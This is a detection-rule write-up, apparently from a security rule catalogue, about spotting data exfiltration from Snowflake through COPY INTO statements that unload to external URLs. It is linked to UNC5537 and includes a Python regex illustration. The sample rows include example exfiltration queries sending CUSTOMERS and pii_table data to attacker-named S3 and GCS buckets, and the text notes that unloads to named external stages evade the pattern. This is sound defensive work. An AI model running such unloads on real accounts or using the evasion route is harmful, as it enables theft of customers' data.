
Summary
This detection rule identifies potential data exfiltration through the Snowflake database service. It looks in Snowflake's query history for COPY INTO statements whose target is a URL, i.e. an unload of table or query results to an external location rather than a load into a table. The detection logic covers queries executed in the last two hours and uses a regular expression to match the COPY INTO ... '<url>' structure. Because the pattern keys on a literal URL target, an unload to a named external stage (COPY INTO @stage ...) would not match, and a load in the other direction (COPY INTO table FROM '<url>') is not exfiltration and should not be flagged. The rule is associated with the threat actor group UNC5537, known for using this method to pull data out of victim Snowflake accounts, and maps to T1567 (Exfiltration Over Web Service): the data leaves the environment through a legitimate cloud storage service, so the transfer itself looks routine. Alerting on these queries quickly narrows the window in which unloaded data can be retrieved and allows the destination bucket or endpoint to be blocked.
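The following is an added illustration of the detection logic, not the rule's own query or code. It reconstructs the check as a regular expression run over constructed rows that mimic the QUERY_ID, QUERY_TEXT and START_TIME columns of Snowflake's ACCOUNT_USAGE.QUERY_HISTORY view; the exact pattern, the URL schemes it covers, and the sample queries are assumptions made here to show which statements match, which do not (a load from a URL, an unload to an internal stage), and how the two-hour window applies.

```python
import re
from datetime import datetime, timedelta, timezone

# Assumed pattern: "COPY INTO" whose *target* is an external URL. Requiring the
# scheme right after COPY INTO (optionally quoted) keeps loads of the form
# COPY INTO table FROM 's3://...' from matching. Case-insensitive because
# Snowflake accepts keywords in any case; \s+ also spans newlines.
COPY_INTO_URL = re.compile(
    r"""\bCOPY\s+INTO\s+['"]?(?:s3|s3gov|s3china|gcs|azure|https?)://""",
    re.IGNORECASE,
)

# The rule described on the page only considers the last two hours.
WINDOW = timedelta(hours=2)


def is_exfil_candidate(query_text: str) -> bool:
    """True when the statement unloads data to an external URL."""
    return COPY_INTO_URL.search(query_text) is not None


def find_copy_into_url(rows, now):
    """Return the QUERY_IDs of rows inside the window whose text matches.

    rows: dicts with QUERY_ID, QUERY_TEXT, START_TIME (tz-aware datetime),
    mimicking a subset of ACCOUNT_USAGE.QUERY_HISTORY columns.
    """
    cutoff = now - WINDOW
    hits = []
    for r in rows:
        if r["START_TIME"] < cutoff:
            continue  # outside the two-hour lookback
        if is_exfil_candidate(r["QUERY_TEXT"]):
            hits.append(r["QUERY_ID"])
    return hits


# Constructed sample data: the "now" of the detection run and five query rows.
NOW = datetime(2024, 5, 31, 12, 0, tzinfo=timezone.utc)
SAMPLE_ROWS = [
    {   # unload of a whole table to an attacker-controlled S3 bucket: match
        "QUERY_ID": "q-1",
        "QUERY_TEXT": "COPY INTO 's3://attacker-bucket/dump/' FROM CUSTOMERS "
                      "FILE_FORMAT = (TYPE = CSV) OVERWRITE = TRUE",
        "START_TIME": NOW - timedelta(minutes=15),
    },
    {   # lower-case, multi-line unload of a SELECT to GCS: match
        "QUERY_ID": "q-2",
        "QUERY_TEXT": "copy into\n'gcs://exfil-out/pii'\nfrom (select * from pii_table)",
        "START_TIME": NOW - timedelta(minutes=90),
    },
    {   # load *from* a URL into a table: ingestion, not exfiltration, no match
        "QUERY_ID": "q-3",
        "QUERY_TEXT": "COPY INTO CUSTOMERS FROM 's3://corp-ingest/customers/'",
        "START_TIME": NOW - timedelta(minutes=5),
    },
    {   # unload to an internal named stage: stays inside Snowflake, no match
        "QUERY_ID": "q-4",
        "QUERY_TEXT": "COPY INTO @my_internal_stage/out FROM ORDERS",
        "START_TIME": NOW - timedelta(minutes=30),
    },
    {   # unload to Azure, but three hours ago: outside the window, no match
        "QUERY_ID": "q-5",
        "QUERY_TEXT": "COPY INTO 'azure://acct.blob.core.windows.net/c/' FROM ORDERS",
        "START_TIME": NOW - timedelta(hours=3),
    },
]


if __name__ == "__main__":
    for qid in find_copy_into_url(SAMPLE_ROWS, NOW):
        print("COPY INTO to external URL:", qid)
```

The row for an unload to a named external stage is deliberately absent from the samples because such a statement would look like q-4 and therefore evade this pattern; covering it requires joining against stage definitions (for example ACCOUNT_USAGE.STAGES, where the stage URL is recorded), which is outside what the rule described here does.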
Categories
- Cloud
- Database
Data Sources
- Application Log
ATT&CK Techniques
- T1567 (Exfiltration Over Web Service)
Created: 2024-05-31